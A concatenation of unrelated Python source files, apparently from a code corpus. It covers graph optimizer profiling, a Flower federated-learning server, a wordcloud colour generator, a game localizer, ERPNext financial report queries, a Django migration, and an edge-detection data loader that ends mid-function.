print
return (self, loop_timing, process_count, max_nb_nodes,
global_opt_timing, nb_nodes, time_lopts, io_toposort_timing)
def print_summary(self, stream=sys.stdout, level=0, depth=-1):
name = getattr(self, 'name', None)
print >> stream, "%s%s %s id=%i" % (
(' ' * level), self.__class__.__name__, name, id(self))
if depth != 0:
for lopt in self.local_optimizers:
lopt.print_summary(stream, level=(level + 2),
depth=(depth - 1))
@staticmethod
def print_profile(stream, prof, level=0):
(opt, loop_timing, process_count, max_nb_nodes,
global_opt_timing, nb_nodes, time_lopts, io_toposort_timing) = prof
blanc = (' ' * level)
print >> stream, blanc, "EquilibriumOptimizer",
print >> stream, blanc, getattr(opt, "name",
getattr(opt, "__name__", ""))
print >> stream, blanc, " time %.3fs for %d passes, %d nodes max" % (
sum(loop_timing), len(loop_timing), max_nb_nodes)
print >> stream, blanc, " time io_toposort %.3fs" % sum(
io_toposort_timing)
for i in range(len(loop_timing)):
print >> stream, blanc, ('%d - %.3fs (%.3fs in global opts, '
'%.3fs io_toposort) - %d nodes' % (
i, loop_timing[i],
global_opt_timing[i],
io_toposort_timing[i], nb_nodes[i]))
count_opt = []
for opt, count in process_count.iteritems():
if count > 0:
count_opt.append((time_lopts[opt], count, opt))
if count_opt:
print >> stream, blanc, 'times applied - optimizer (only those applied):'
count_opt.sort()
for (t, count, opt) in count_opt[::-1]:
print >> stream, blanc, ' %.3fs - %d - %s' % (
t, count, opt)
print >> stream
@staticmethod
def merge_profile(prof1, prof2):
#(opt, loop_timing, process_count, max_nb_nodes,
# global_opt_timing, nb_nodes, time_lopts, io_toposort_timing) = prof1
local_optimizers = set(prof1[0].local_optimizers).union(
prof2[0].local_optimizers)
global_optimizers = set(prof1[0].global_optimizers).union(
prof2[0].global_optimizers)
new_opt = EquilibriumOptimizer(
local_optimizers.union(global_optimizers),
max_use_ratio=1)
def merge_list(l1, l2):
l = copy.copy(l1)
for idx, nb in enumerate(l2):
if idx < len(l):
l[idx] += nb
else:
l.append(nb)
return l
loop_timing = merge_list(prof1[1], prof2[1])
process_count = prof1[2].copy()
for process, count in prof2[2].iteritems():
if process in process_count:
process_count[process] += count
else:
process_count[process] = count
max_nb_nodes = max(prof1[3], prof2[3])
global_opt_timing = merge_list(prof1[4], prof2[4])
nb_nodes = merge_list(prof1[5], prof2[5])
time_lopts = prof1[6].copy()
for opt, t in prof2[6].iteritems():
if opt in time_lopts:
time_lopts[opt] += t
else:
time_lopts[opt] = t
io_toposort_timing = merge_list(prof1[7], prof2[7])
assert (len(loop_timing) == len(global_opt_timing) ==
len(io_toposort_timing) == len(nb_nodes))
assert len(loop_timing) == max(len(prof1[1]), len(prof2[1]))
return (new_opt,
loop_timing,
process_count,
max_nb_nodes,
global_opt_timing,
nb_nodes,
time_lopts,
io_toposort_timing)
#################
### Utilities ###
#################
def _check_chain(r, chain):
"""WRITEME"""
chain = list(reversed(chain))
while chain:
elem = chain.pop()
if elem is None:
if not r.owner is None:
return False
elif r.owner is None:
return False
elif isinstance(elem, op.Op):
if not r.owner.op == elem:
return False
else:
try:
if (issubclass(elem, op.Op)
and not isinstance(r.owner.op, elem)):
return False
except TypeError:
return False
if chain:
r = r.owner.inputs[chain.pop()]
#print 'check_chain', _check_chain.n_calls
#_check_chain.n_calls += 1
# The return value will be used as a Boolean, but some Variables cannot
# be used as Booleans (the results of comparisons, for instance)
return (r is not None)
#_check_chain.n_calls = 0
def check_chain(r, *chain):
"""WRITEME"""
if isinstance(r, graph.Apply):
r = r.outputs[0]
return _check_chain(r, reduce(list.__iadd__, ([x, 0] for x in chain)))
def pre_greedy_local_optimizer(list_optimizations, out):
'''
This function traverses the computation graph described by all
``node`` in the graph before the variable out but that are not in the fgraph.
it applies each of the local_optimizations on the traversed graph.
Its main use is to apply locally constant folding when generating
the graph of the indices of a subtensor.
We should not apply optimizations on node that are in fgraph.
So we don't optimize node that have an attribute fgraph.
:note: This don't do an equilibrium... So if there is optimization
like local_upcast_elemwise_constant_inputs in the list, that
add additional node to the inputs of the node, it can
be needed to call this function multiple time.
'''
def local_recursive_function(list_opt, out, optimized_vars, depth):
if not getattr(out, 'owner', None):
return [out], optimized_vars
node = out.owner
if hasattr(node, 'fgraph'):
return node.outputs, optimized_vars
for idx, inp in enumerate(node.inputs):
if inp in optimized_vars:
nw_in = optimized_vars[inp]
else:
if inp.owner:
outs, optimized_vars = local_recursive_function(
list_opt,
inp,
optimized_vars,
depth + 1)
for k, v in zip(inp.owner.outputs, outs):
optimized_vars[k] = v
nw_in = outs[inp.owner.outputs.index(inp)]
else:
nw_in = inp
optimized_vars[inp] = inp
node.inputs[idx] = nw_in
results = node.outputs
for opt in list_opt:
ret = opt.transform(node)
if ret is not False and ret is not None:
assert len(ret) == len(node.outputs)
for k, v in zip(node.outputs, ret):
optimized_vars[k] = v
results = ret
if ret[0].owner:
node = out.owner
else:
break
return results, optimized_vars
final_outs, optimized_nodes = local_recursive_function(
list_optimizations, out, {}, 0)
return final_outs[0]
############
### Misc ###
############
class InplaceOptimizer(Optimizer):
def __init__(self, inplace):
self.inplace = inplace
def apply(self, fgraph):
self.inplace(fgraph)
def add_requirements(self, fgraph):
fgraph.attach_feature(dh.DestroyHandler())
class PureThenInplaceOptimizer(Optimizer):
def __init__(self, pure, inplace):
self.pure = pure
self.inplace = inplace
def apply(self, fgraph):
self.pure(fgraph)
fgraph.attach_feature(dh.DestroyHandler())
self.inplace(fgraph)
|
py | 7dfce5b96d6fe4864ebb617d7467c6360afee308 | # Copyright 2020 Adap GmbH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Minimal example on how to start a simple Flower server."""
import argparse
from typing import Callable, Dict, Optional, Tuple
import numpy as np
import flwr as fl
from . import DEFAULT_SERVER_ADDRESS, fashion_mnist
def main() -> None:
"""Start server and train five rounds."""
parser = argparse.ArgumentParser(description="Flower")
parser.add_argument(
"--server_address",
type=str,
default=DEFAULT_SERVER_ADDRESS,
help=f"gRPC server address (default: {DEFAULT_SERVER_ADDRESS})",
)
parser.add_argument(
"--rounds",
type=int,
default=1,
help="Number of rounds of federated learning (default: 1)",
)
parser.add_argument(
"--sample_fraction",
type=float,
default=0.1,
help="Fraction of available clients used for fit/evaluate (default: 0.1)",
)
parser.add_argument(
"--min_sample_size",
type=int,
default=1,
help="Minimum number of clients used for fit/evaluate (default: 1)",
)
parser.add_argument(
"--min_num_clients",
type=int,
default=1,
help="Minimum number of available clients required for sampling (default: 1)",
)
parser.add_argument(
"--log_host", type=str, help="Logserver address (no default)",
)
args = parser.parse_args()
# Configure logger
fl.common.logger.configure("server", host=args.log_host)
# Load evaluation data
_, xy_test = fashion_mnist.load_data(partition=0, num_partitions=1)
# Create client_manager, strategy, and server
client_manager = fl.server.SimpleClientManager()
strategy = fl.server.strategy.DefaultStrategy(
fraction_fit=args.sample_fraction,
min_fit_clients=args.min_sample_size,
min_available_clients=args.min_num_clients,
eval_fn=get_eval_fn(xy_test=xy_test),
on_fit_config_fn=fit_config,
)
server = fl.server.Server(client_manager=client_manager, strategy=strategy)
# Run server
fl.server.start_server(
args.server_address, server, config={"num_rounds": args.rounds},
)
def fit_config(rnd: int) -> Dict[str, str]:
"""Return a configuration with static batch size and (local) epochs."""
config = {
"epoch_global": str(rnd),
"epochs": str(1),
"batch_size": str(64),
}
return config
def get_eval_fn(
xy_test: Tuple[np.ndarray, np.ndarray]
) -> Callable[[fl.common.Weights], Optional[Tuple[float, float]]]:
"""Return an evaluation function for centralized evaluation."""
def evaluate(weights: fl.common.Weights) -> Optional[Tuple[float, float]]:
"""Use the entire Fashion-MNIST test set for evaluation."""
model = fashion_mnist.load_model()
model.set_weights(weights)
loss, acc = model.evaluate(xy_test[0], xy_test[1], batch_size=len(xy_test))
return float(loss), float(acc)
return evaluate
if __name__ == "__main__":
main()
|
py | 7dfce6a0659bfc789be0b2157056eda6d5d18344 | import numpy as np
from PIL import ImageFont
class ImageColorGenerator(object):
"""Color generator based on a color image.
Generates colors based on an RGB image. A word will be colored using
the mean color of the enclosing rectangle in the color image.
After construction, the object acts as a callable that can be passed as
color_func to the word cloud constructor or to the recolor method.
Parameters
----------
image : nd-array, shape (height, width, 3)
Image to use to generate word colors. Alpha channels are ignored.
This should be the same size as the canvas. for the wordcloud.
"""
# returns the average color of the image in that region
def __init__(self, image):
if image.ndim not in [2, 3]:
raise ValueError("ImageColorGenerator needs an image with ndim 2 or"
" 3, got %d" % image.ndim)
if image.ndim == 3 and image.shape[2] not in [3, 4]:
raise ValueError("A color image needs to have 3 or 4 channels, got %d"
% image.shape[2])
self.image = image
def __call__(self, word, font_size, font_path, position, orientation, **kwargs):
"""Generate a color for a given word using a fixed image."""
# get the font to get the box size
font = ImageFont.truetype(font_path, font_size)
transposed_font = ImageFont.TransposedFont(font,
orientation=orientation)
# get size of resulting text
box_size = transposed_font.getsize(word)
x = position[0]
y = position[1]
# cut out patch under word box
patch = self.image[x:x + box_size[0], y:y + box_size[1]]
if patch.ndim == 3:
# drop alpha channel if any
patch = patch[:, :, :3]
if patch.ndim == 2:
raise NotImplementedError("Gray-scale images TODO")
color = np.mean(patch.reshape(-1, 3), axis=0)
return "rgb(%d, %d, %d)" % tuple(color)
|
py | 7dfce6dd535b4cad6fb0dfae6d8ab7e13fe00ac7 | from panda3d.core import *
from direct.showbase import DConfig
import string
import types
try:
language = DConfig.GetString('language', 'english')
checkLanguage = DConfig.GetBool('check-language', 0)
except:
language = simbase.config.GetString('language', 'english')
checkLanguage = simbase.config.GetBool('check-language', 0)
def getLanguage():
return language
print('TTLocalizer: Running in language: %s' % language)
if language == 'english':
_languageModule = 'toontown.toonbase.TTLocalizer' + language.capitalize()
else:
checkLanguage = 1
_languageModule = 'toontown.toonbase.TTLocalizer_' + language
print('from ' + _languageModule + ' import *')
from toontown.toonbase.TTLocalizerEnglish import *
if checkLanguage:
l = {}
g = {}
englishModule = __import__('toontown.toonbase.TTLocalizerEnglish', g, l)
foreignModule = __import__(_languageModule, g, l)
for key, val in list(englishModule.__dict__.items()):
if key not in foreignModule.__dict__:
print('WARNING: Foreign module: %s missing key: %s' % (_languageModule, key))
locals()[key] = val
elif isinstance(val, dict):
fval = foreignModule.__dict__.get(key)
for dkey, dval in list(val.items()):
if dkey not in fval:
print('WARNING: Foreign module: %s missing key: %s.%s' % (_languageModule, key, dkey))
fval[dkey] = dval
for dkey in list(fval.keys()):
if dkey not in val:
print('WARNING: Foreign module: %s extra key: %s.%s' % (_languageModule, key, dkey))
for key in list(foreignModule.__dict__.keys()):
if key not in englishModule.__dict__:
print('WARNING: Foreign module: %s extra key: %s' % (_languageModule, key))
|
py | 7dfce85629b832ebfa494dbd3688e09d5899c980 | # -*- coding: utf-8 -*-
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import re
from past.builtins import cmp
import functools
import math
import frappe, erpnext
from erpnext.accounts.report.utils import get_currency, convert_to_presentation_currency
from erpnext.accounts.utils import get_fiscal_year
from frappe import _
from frappe.utils import (flt, getdate, get_first_day, add_months, add_days, formatdate, cstr, cint)
from six import itervalues
from erpnext.accounts.doctype.accounting_dimension.accounting_dimension import get_accounting_dimensions, get_dimension_with_children
def get_period_list(from_fiscal_year, to_fiscal_year, period_start_date, period_end_date, filter_based_on, periodicity, accumulated_values=False,
company=None, reset_period_on_fy_change=True, ignore_fiscal_year=False):
"""Get a list of dict {"from_date": from_date, "to_date": to_date, "key": key, "label": label}
Periodicity can be (Yearly, Quarterly, Monthly)"""
if filter_based_on == 'Fiscal Year':
fiscal_year = get_fiscal_year_data(from_fiscal_year, to_fiscal_year)
validate_fiscal_year(fiscal_year, from_fiscal_year, to_fiscal_year)
year_start_date = getdate(fiscal_year.year_start_date)
year_end_date = getdate(fiscal_year.year_end_date)
else:
validate_dates(period_start_date, period_end_date)
year_start_date = getdate(period_start_date)
year_end_date = getdate(period_end_date)
months_to_add = {
"Yearly": 12,
"Half-Yearly": 6,
"Quarterly": 3,
"Monthly": 1
}[periodicity]
period_list = []
start_date = year_start_date
months = get_months(year_start_date, year_end_date)
for i in range(cint(math.ceil(months / months_to_add))):
period = frappe._dict({
"from_date": start_date
})
to_date = add_months(start_date, months_to_add)
start_date = to_date
# Subtract one day from to_date, as it may be first day in next fiscal year or month
to_date = add_days(to_date, -1)
if to_date <= year_end_date:
# the normal case
period.to_date = to_date
else:
# if a fiscal year ends before a 12 month period
period.to_date = year_end_date
if not ignore_fiscal_year:
period.to_date_fiscal_year = get_fiscal_year(period.to_date, company=company)[0]
period.from_date_fiscal_year_start_date = get_fiscal_year(period.from_date, company=company)[1]
period_list.append(period)
if period.to_date == year_end_date:
break
# common processing
for opts in period_list:
key = opts["to_date"].strftime("%b_%Y").lower()
if periodicity == "Monthly" and not accumulated_values:
label = formatdate(opts["to_date"], "MMM YYYY")
else:
if not accumulated_values:
label = get_label(periodicity, opts["from_date"], opts["to_date"])
else:
if reset_period_on_fy_change:
label = get_label(periodicity, opts.from_date_fiscal_year_start_date, opts["to_date"])
else:
label = get_label(periodicity, period_list[0].from_date, opts["to_date"])
opts.update({
"key": key.replace(" ", "_").replace("-", "_"),
"label": label,
"year_start_date": year_start_date,
"year_end_date": year_end_date
})
return period_list
def get_fiscal_year_data(from_fiscal_year, to_fiscal_year):
fiscal_year = frappe.db.sql("""select min(year_start_date) as year_start_date,
max(year_end_date) as year_end_date from `tabFiscal Year` where
name between %(from_fiscal_year)s and %(to_fiscal_year)s""",
{'from_fiscal_year': from_fiscal_year, 'to_fiscal_year': to_fiscal_year}, as_dict=1)
return fiscal_year[0] if fiscal_year else {}
def validate_fiscal_year(fiscal_year, from_fiscal_year, to_fiscal_year):
if not fiscal_year.get('year_start_date') or not fiscal_year.get('year_end_date'):
frappe.throw(_("Start Year and End Year are mandatory"))
if getdate(fiscal_year.get('year_end_date')) < getdate(fiscal_year.get('year_start_date')):
frappe.throw(_("End Year cannot be before Start Year"))
def validate_dates(from_date, to_date):
if not from_date or not to_date:
frappe.throw("From Date and To Date are mandatory")
if to_date < from_date:
frappe.throw("To Date cannot be less than From Date")
def get_months(start_date, end_date):
diff = (12 * end_date.year + end_date.month) - (12 * start_date.year + start_date.month)
return diff + 1
def get_label(periodicity, from_date, to_date):
if periodicity == "Yearly":
if formatdate(from_date, "YYYY") == formatdate(to_date, "YYYY"):
label = formatdate(from_date, "YYYY")
else:
label = formatdate(from_date, "YYYY") + "-" + formatdate(to_date, "YYYY")
else:
label = formatdate(from_date, "MMM YY") + "-" + formatdate(to_date, "MMM YY")
return label
def get_data(
company, root_type, balance_must_be, period_list, filters=None,
accumulated_values=1, only_current_fiscal_year=True, ignore_closing_entries=False,
ignore_accumulated_values_for_fy=False , total = True):
accounts = get_accounts(company, root_type)
if not accounts:
return None
accounts, accounts_by_name, parent_children_map = filter_accounts(accounts)
company_currency = get_appropriate_currency(company, filters)
gl_entries_by_account = {}
for root in frappe.db.sql("""select lft, rgt from tabAccount
where root_type=%s and ifnull(parent_account, '') = ''""", root_type, as_dict=1):
set_gl_entries_by_account(
company,
period_list[0]["year_start_date"] if only_current_fiscal_year else None,
period_list[-1]["to_date"],
root.lft, root.rgt, filters,
gl_entries_by_account, ignore_closing_entries=ignore_closing_entries
)
calculate_values(
accounts_by_name, gl_entries_by_account, period_list, accumulated_values, ignore_accumulated_values_for_fy)
accumulate_values_into_parents(accounts, accounts_by_name, period_list)
out = prepare_data(accounts, balance_must_be, period_list, company_currency)
out = filter_out_zero_value_rows(out, parent_children_map)
if out and total:
add_total_row(out, root_type, balance_must_be, period_list, company_currency)
return out
def get_appropriate_currency(company, filters=None):
if filters and filters.get("presentation_currency"):
return filters["presentation_currency"]
else:
return frappe.get_cached_value('Company', company, "default_currency")
def calculate_values(
accounts_by_name, gl_entries_by_account, period_list, accumulated_values, ignore_accumulated_values_for_fy):
for entries in itervalues(gl_entries_by_account):
for entry in entries:
d = accounts_by_name.get(entry.account)
if not d:
frappe.msgprint(
_("Could not retrieve information for {0}.").format(entry.account), title="Error",
raise_exception=1
)
for period in period_list:
# check if posting date is within the period
if entry.posting_date <= period.to_date:
if (accumulated_values or entry.posting_date >= period.from_date) and \
(not ignore_accumulated_values_for_fy or
entry.fiscal_year == period.to_date_fiscal_year):
d[period.key] = d.get(period.key, 0.0) + flt(entry.debit) - flt(entry.credit)
if entry.posting_date < period_list[0].year_start_date:
d["opening_balance"] = d.get("opening_balance", 0.0) + flt(entry.debit) - flt(entry.credit)
def accumulate_values_into_parents(accounts, accounts_by_name, period_list):
"""accumulate children's values in parent accounts"""
for d in reversed(accounts):
if d.parent_account:
for period in period_list:
accounts_by_name[d.parent_account][period.key] = \
accounts_by_name[d.parent_account].get(period.key, 0.0) + d.get(period.key, 0.0)
accounts_by_name[d.parent_account]["opening_balance"] = \
accounts_by_name[d.parent_account].get("opening_balance", 0.0) + d.get("opening_balance", 0.0)
def prepare_data(accounts, balance_must_be, period_list, company_currency):
data = []
year_start_date = period_list[0]["year_start_date"].strftime("%Y-%m-%d")
year_end_date = period_list[-1]["year_end_date"].strftime("%Y-%m-%d")
for d in accounts:
# add to output
has_value = False
total = 0
row = frappe._dict({
"account": _(d.name),
"parent_account": _(d.parent_account) if d.parent_account else '',
"indent": flt(d.indent),
"year_start_date": year_start_date,
"year_end_date": year_end_date,
"currency": company_currency,
"include_in_gross": d.include_in_gross,
"account_type": d.account_type,
"is_group": d.is_group,
"opening_balance": d.get("opening_balance", 0.0) * (1 if balance_must_be=="Debit" else -1),
"account_name": ('%s - %s' %(_(d.account_number), _(d.account_name))
if d.account_number else _(d.account_name))
})
for period in period_list:
if d.get(period.key) and balance_must_be == "Credit":
# change sign based on Debit or Credit, since calculation is done using (debit - credit)
d[period.key] *= -1
row[period.key] = flt(d.get(period.key, 0.0), 3)
if abs(row[period.key]) >= 0.005:
# ignore zero values
has_value = True
total += flt(row[period.key])
row["has_value"] = has_value
row["total"] = total
data.append(row)
return data
def filter_out_zero_value_rows(data, parent_children_map, show_zero_values=False):
data_with_value = []
for d in data:
if show_zero_values or d.get("has_value"):
data_with_value.append(d)
else:
# show group with zero balance, if there are balances against child
children = [child.name for child in parent_children_map.get(d.get("account")) or []]
if children:
for row in data:
if row.get("account") in children and row.get("has_value"):
data_with_value.append(d)
break
return data_with_value
def add_total_row(out, root_type, balance_must_be, period_list, company_currency):
total_row = {
"account_name": _("Total {0} ({1})").format(_(root_type), _(balance_must_be)),
"account": _("Total {0} ({1})").format(_(root_type), _(balance_must_be)),
"currency": company_currency
}
for row in out:
if not row.get("parent_account"):
for period in period_list:
total_row.setdefault(period.key, 0.0)
total_row[period.key] += row.get(period.key, 0.0)
row[period.key] = row.get(period.key, 0.0)
total_row.setdefault("total", 0.0)
total_row["total"] += flt(row["total"])
row["total"] = ""
if "total" in total_row:
out.append(total_row)
# blank row after Total
out.append({})
def get_accounts(company, root_type):
return frappe.db.sql("""
select name, account_number, parent_account, lft, rgt, root_type, report_type, account_name, include_in_gross, account_type, is_group, lft, rgt
from `tabAccount`
where company=%s and root_type=%s order by lft""", (company, root_type), as_dict=True)
def filter_accounts(accounts, depth=20):
parent_children_map = {}
accounts_by_name = {}
for d in accounts:
accounts_by_name[d.name] = d
parent_children_map.setdefault(d.parent_account or None, []).append(d)
filtered_accounts = []
def add_to_list(parent, level):
if level < depth:
children = parent_children_map.get(parent) or []
sort_accounts(children, is_root=True if parent==None else False)
for child in children:
child.indent = level
filtered_accounts.append(child)
add_to_list(child.name, level + 1)
add_to_list(None, 0)
return filtered_accounts, accounts_by_name, parent_children_map
def sort_accounts(accounts, is_root=False, key="name"):
"""Sort root types as Asset, Liability, Equity, Income, Expense"""
def compare_accounts(a, b):
if re.split('\W+', a[key])[0].isdigit():
# if chart of accounts is numbered, then sort by number
return cmp(a[key], b[key])
elif is_root:
if a.report_type != b.report_type and a.report_type == "Balance Sheet":
return -1
if a.root_type != b.root_type and a.root_type == "Asset":
return -1
if a.root_type == "Liability" and b.root_type == "Equity":
return -1
if a.root_type == "Income" and b.root_type == "Expense":
return -1
else:
# sort by key (number) or name
return cmp(a[key], b[key])
return 1
accounts.sort(key = functools.cmp_to_key(compare_accounts))
def set_gl_entries_by_account(
company, from_date, to_date, root_lft, root_rgt, filters, gl_entries_by_account, ignore_closing_entries=False):
"""Returns a dict like { "account": [gl entries], ... }"""
additional_conditions = get_additional_conditions(from_date, ignore_closing_entries, filters)
accounts = frappe.db.sql_list("""select name from `tabAccount`
where lft >= %s and rgt <= %s and company = %s""", (root_lft, root_rgt, company))
if accounts:
additional_conditions += " and account in ({})"\
.format(", ".join([frappe.db.escape(d) for d in accounts]))
gl_filters = {
"company": company,
"from_date": from_date,
"to_date": to_date,
"finance_book": cstr(filters.get("finance_book"))
}
if filters.get("include_default_book_entries"):
gl_filters["company_fb"] = frappe.db.get_value("Company",
company, 'default_finance_book')
for key, value in filters.items():
if value:
gl_filters.update({
key: value
})
distributed_cost_center_query = ""
if filters and filters.get('cost_center'):
distributed_cost_center_query = """
UNION ALL
SELECT posting_date,
account,
debit*(DCC_allocation.percentage_allocation/100) as debit,
credit*(DCC_allocation.percentage_allocation/100) as credit,
is_opening,
fiscal_year,
debit_in_account_currency*(DCC_allocation.percentage_allocation/100) as debit_in_account_currency,
credit_in_account_currency*(DCC_allocation.percentage_allocation/100) as credit_in_account_currency,
account_currency
FROM `tabGL Entry`,
(
SELECT parent, sum(percentage_allocation) as percentage_allocation
FROM `tabDistributed Cost Center`
WHERE cost_center IN %(cost_center)s
AND parent NOT IN %(cost_center)s
GROUP BY parent
) as DCC_allocation
WHERE company=%(company)s
{additional_conditions}
AND posting_date <= %(to_date)s
AND is_cancelled = 0
AND cost_center = DCC_allocation.parent
""".format(additional_conditions=additional_conditions.replace("and cost_center in %(cost_center)s ", ''))
gl_entries = frappe.db.sql("""select posting_date, account, debit, credit, is_opening, fiscal_year, debit_in_account_currency, credit_in_account_currency, account_currency from `tabGL Entry`
where company=%(company)s
{additional_conditions}
and posting_date <= %(to_date)s
and is_cancelled = 0
{distributed_cost_center_query}
order by account, posting_date""".format(
additional_conditions=additional_conditions,
distributed_cost_center_query=distributed_cost_center_query), gl_filters, as_dict=True) #nosec
if filters and filters.get('presentation_currency'):
convert_to_presentation_currency(gl_entries, get_currency(filters), filters.get('company'))
for entry in gl_entries:
gl_entries_by_account.setdefault(entry.account, []).append(entry)
return gl_entries_by_account
def get_additional_conditions(from_date, ignore_closing_entries, filters):
additional_conditions = []
accounting_dimensions = get_accounting_dimensions(as_list=False)
if ignore_closing_entries:
additional_conditions.append("ifnull(voucher_type, '')!='Period Closing Voucher'")
if from_date:
additional_conditions.append("posting_date >= %(from_date)s")
if filters:
if filters.get("project"):
if not isinstance(filters.get("project"), list):
filters.project = frappe.parse_json(filters.get("project"))
additional_conditions.append("project in %(project)s")
if filters.get("cost_center"):
filters.cost_center = get_cost_centers_with_children(filters.cost_center)
additional_conditions.append("cost_center in %(cost_center)s")
if filters.get("include_default_book_entries"):
additional_conditions.append("(finance_book in (%(finance_book)s, %(company_fb)s, '') OR finance_book IS NULL)")
else:
additional_conditions.append("(finance_book in (%(finance_book)s, '') OR finance_book IS NULL)")
if accounting_dimensions:
for dimension in accounting_dimensions:
if filters.get(dimension.fieldname):
if frappe.get_cached_value('DocType', dimension.document_type, 'is_tree'):
filters[dimension.fieldname] = get_dimension_with_children(dimension.document_type,
filters.get(dimension.fieldname))
additional_conditions.append("{0} in %({0})s".format(dimension.fieldname))
else:
additional_conditions.append("{0} in (%({0})s)".format(dimension.fieldname))
return " and {}".format(" and ".join(additional_conditions)) if additional_conditions else ""
def get_cost_centers_with_children(cost_centers):
if not isinstance(cost_centers, list):
cost_centers = [d.strip() for d in cost_centers.strip().split(',') if d]
all_cost_centers = []
for d in cost_centers:
if frappe.db.exists("Cost Center", d):
lft, rgt = frappe.db.get_value("Cost Center", d, ["lft", "rgt"])
children = frappe.get_all("Cost Center", filters={"lft": [">=", lft], "rgt": ["<=", rgt]})
all_cost_centers += [c.name for c in children]
else:
frappe.throw(_("Cost Center: {0} does not exist").format(d))
return list(set(all_cost_centers))
def get_columns(periodicity, period_list, accumulated_values=1, company=None):
columns = [{
"fieldname": "account",
"label": _("Account"),
"fieldtype": "Link",
"options": "Account",
"width": 300
}]
if company:
columns.append({
"fieldname": "currency",
"label": _("Currency"),
"fieldtype": "Link",
"options": "Currency",
"hidden": 1
})
for period in period_list:
columns.append({
"fieldname": period.key,
"label": period.label,
"fieldtype": "Currency",
"options": "currency",
"width": 150
})
if periodicity!="Yearly":
if not accumulated_values:
columns.append({
"fieldname": "total",
"label": _("Total"),
"fieldtype": "Currency",
"width": 150
})
return columns |
py | 7dfce8b964db0124271ec368b119028c20cb2e41 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('competitions', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='News',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('heading', models.CharField(max_length=500, verbose_name='heading')),
('text', models.CharField(max_length=500, null=True, verbose_name='text', blank=True)),
('added_at', models.DateTimeField(auto_now_add=True, verbose_name='added at')),
('modified_at', models.DateTimeField(auto_now=True, verbose_name='modified at')),
('added_by', models.ForeignKey(related_name='News_created', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True, verbose_name='author')),
('competition', models.ForeignKey(verbose_name='competition', to='competitions.Competition')),
('modified_by', models.ForeignKey(related_name='News_modified', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True, verbose_name='last modified by')),
],
options={
'verbose_name': 'News',
'verbose_name_plural': 'News',
},
bases=(models.Model,),
),
]
|
py | 7dfce963b28e0535c8e8e979d70ca2f2dc45b85a | import numpy as np
import cv2
from random import random
from random import shuffle
from random import randint
from random import uniform
import os
import matplotlib.pyplot as plt
def datastreamer_BIPED(batch_size = 10 , target_shape = (512,512), mode = 'train', base_path = '/Users/sarojitauddya/edges_detect/BIPED/edges/', debug = False):
#print(mode)
#print("Entered")
#print(debug)
target_x, target_y = target_shape
edge_base_path = base_path + 'edge_maps/'
imgs_base_path = base_path + 'imgs/'
edge_path = ''
imgs_path = ''
if mode=='train':
edge_path = edge_base_path + 'train/rgbr/real/'
imgs_path = imgs_base_path + 'train/rgbr/real/'
elif mode=='test':
edge_path = edge_base_path + 'test/rgbr/'
imgs_path = imgs_base_path + 'test/rgbr/'
list_edge = os.listdir(edge_path)
list_imgs = os.listdir(imgs_path)
#print(list_edge)
#print(list_imgs)
num_images = 0
while 1:
shuffle(list_edge)
imgs_batch = []
edge_batch = []
for filename in list_edge:
if filename[-3:]!='png' and filename[-3:]!='jpg':
continue
if num_images == batch_size:
num_images = 0
imgs_batch = np.array(imgs_batch)
#print(type(edge_batch))
edge_batch = np.array(edge_batch)
if imgs_batch.shape[0] == 0:
pass
else:
yield imgs_batch, edge_batch
imgs_batch = []
edge_batch = []
image_path = imgs_path + filename[:-3] + 'jpg'
edges_path = edge_path + filename
image = plt.imread(image_path)
edges = plt.imread(edges_path)
if debug:
print("Max Image pixel: "+str(np.max(image)))
print("Min Image pixel: "+str(np.min(image)))
patch_image = np.zeros((target_x,target_y,3))
patch_edges = np.zeros((target_x,target_y,1))
size_x, size_y,_ = image.shape
edges = np.reshape(edges, (size_x, size_y, 1))
if size_x <= target_x or size_y <= target_y: #May not be the case for BIPED dataset
print("Oddity in the BIPED dataset")
patch_image = cv2.resize(image, (target_x, target_y), interpolation = cv2.INTER_CUBIC)
patch_edges = cv2.resize(edges, (target_x, target_y), interpolation = cv2.INTER_CUBIC)
#Generally the size of images in BIPED dataset is 720 by 1280
#Random patch based training
start_x, start_y = randint(0, size_x - target_x), randint(0, size_y - target_y)
patch_image = image[start_x:start_x + target_x, start_y:start_y + target_y,:]
patch_edges = edges[start_x:start_x + target_x, start_y:start_y + target_y,:]
#Random rotations (0,90,180,270)
#Randomly rotate/flip
rn_un = uniform(0,1)
cv2_object = None
if rn_un <= 0.25:
cv2_object = cv2.ROTATE_90_COUNTERCLOCKWISE #counterclockwise 90
elif rn_un > 0.25 and rn_un<=0.5:
cv2_object = cv2.ROTATE_90_CLOCKWISE #clockwise 90
elif rn_un >0.5 and rn_un<=0.75:
cv2_object = cv2.ROTATE_180 #flip
else:
cv2_object = None
if False:
patch_image = cv2.rotate(patch_image, cv2_object)
patch_edges = cv2.rotate(patch_edges, cv2_object)
#Colour based augmentation
#Randomly choose channels
ch1 = randint(0,2)
ch2 = randint(0,2)
ch3 = randint(0,2)
if debug:
print("*****Chosen channels*****")
print(ch1, ch2, ch3)
print("*************************")
patch_image_colour_aug = np.zeros(patch_image.shape)
patch_image_colour_aug[:,:,0] = patch_image[:,:,ch1]
patch_image_colour_aug[:,:,1] = patch_image[:,:,ch2]
patch_image_colour_aug[:,:,2] = patch_image[:,:,ch3]
patch_image = np.uint8(patch_image_colour_aug)
#Thicken edges
kernel = np.ones((2,2))
patch_edges = cv2.dilate(patch_edges, kernel, iterations = 2)
if debug:
plt.imshow(patch_image)
plt.title("Patch Image")
plt.show()
plt.imshow(patch_edges)
plt.title("Patch Edge")
plt.show()
patch_image = np.float32(patch_image)
